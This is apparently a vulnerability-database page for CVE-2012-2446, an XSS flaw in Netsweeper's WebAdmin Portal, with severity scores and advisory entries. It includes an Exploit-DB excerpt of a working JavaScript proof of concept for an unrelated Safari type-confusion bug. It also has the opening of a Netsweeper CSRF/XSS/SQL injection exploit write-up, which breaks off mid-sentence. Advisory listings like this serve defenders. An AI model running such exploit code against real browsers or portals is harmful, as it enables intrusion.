CVE-2012-2446
published 2012-07-09CVE-2012-2446: Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.06%
60.2th percentile
Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script or HTML via the group parameter in a lookup action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mq9w-jgw2-mvrp: Cross-site scripting (XSS) vulnerability in tools/local_lookup
ghsa_unreviewed·2022-05-17
CVE-2012-2446 [MEDIUM] CWE-79 GHSA-mq9w-jgw2-mvrp: Cross-site scripting (XSS) vulnerability in tools/local_lookup
Cross-site scripting (XSS) vulnerability in tools/local_lookup.php in the WebAdmin Portal in Netsweeper allows remote attackers to inject arbitrary web script or HTML via the group parameter in a lookup action.
GHSA
GHSA-xcw4-g6h8-wpcq: Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and
ghsa_unreviewed·2022-05-17·CVSS 4.3
CVE-2012-3859 [MEDIUM] GHSA-xcw4-g6h8-wpcq: Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and
Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and CVE-2012-2447.
No detection rules found.
Exploit-DB
Apple Safari - 'DateTimeFormat.format' Type Confusion
exploitdb·2017-03-27
CVE-2017-2446 Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - 'DateTimeFormat.format' Type Confusion
---
var date = new Date(Date.UTC(2012, 11, 20, 3, 0, 0));
var i = new Intl.DateTimeFormat();
//print(i);
var q;
function f(){
//print("in f");
//print(f.caller);
q = f.caller;
return 10;
}
try{
i.format({valueOf : f});
}catch(e){
//print("problem");
}
//print(q);
q.call(0x77777777);
Exploit-DB
Netsweeper WebAdmin Portal - Multiple Vulnerabilities
exploitdb·2012-09-17·CVSS 4.3
CVE-2012-3859 [MEDIUM] Netsweeper WebAdmin Portal - Multiple Vulnerabilities
Netsweeper WebAdmin Portal - Multiple Vulnerabilities
---
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and SQL Injection ("The later")\
# Date: Discovered and reported CSRF and XSS 4/2012 and "The later" 7/2012\
# Author: Jacob Holcomb/Gimppy042\
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)\
# CVE :
CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and
CVE-2012-3859 for the SQL Injection ("The later)
NOTE:
# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.
CSRF Exploitation:
In the following example we use CSRF to forge a HTTP POST request that will cr
No writeups or analysis indexed.
2012-07-09
Published